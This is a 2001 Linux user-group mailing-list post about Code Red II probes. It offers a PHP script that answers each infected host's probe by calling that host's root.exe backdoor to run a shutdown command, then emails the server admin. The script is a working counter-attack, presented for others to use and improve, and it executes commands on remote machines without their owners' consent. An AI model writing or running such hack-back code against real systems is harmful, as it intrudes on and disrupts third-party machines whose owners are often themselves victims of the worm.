[NTLUG:Discuss] Code Red Concerns Revisited
Paul Ingendorf
pauldy at wantek.net
Tue Sep 11 19:05:00 CDT 2001
In a properly configured apache setup and php setup with track vars on you could also use something like the following.
<?php
$remoteserver = fopen("http://" . $REMOTE_ADDR . "/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");
$response = fread($remoteserver,0);
mail($SERVER_ADMIN, "Code Red II Attack", "Remote IP: $REMOTE_ADDR\n\n\nServer Name : $SERVER_NAME\n\n\nServer Port : $SERVER_PORT\n\n\nRequest URL : $REQUEST_URI\n\n\nResponse : $response", "From: coderedkiller@$SERVER_NAME\n");
?>
This code should shut the machine down. Power down on most systems. Plus it sends you a nice little e-mail you can use to track all these lamos who after a month and a week still run around with their pants down. The only thing I'm not sure of in the code is the response. With the size set to 0 I figured it would just run the specified command take the result and die sending me the response so I would know if it ran right or not. It does not seem to be doing that so if you wanted you could easily skip that step or see if you can make it work and please let me know how you did it.
More information about the Discuss
mailing list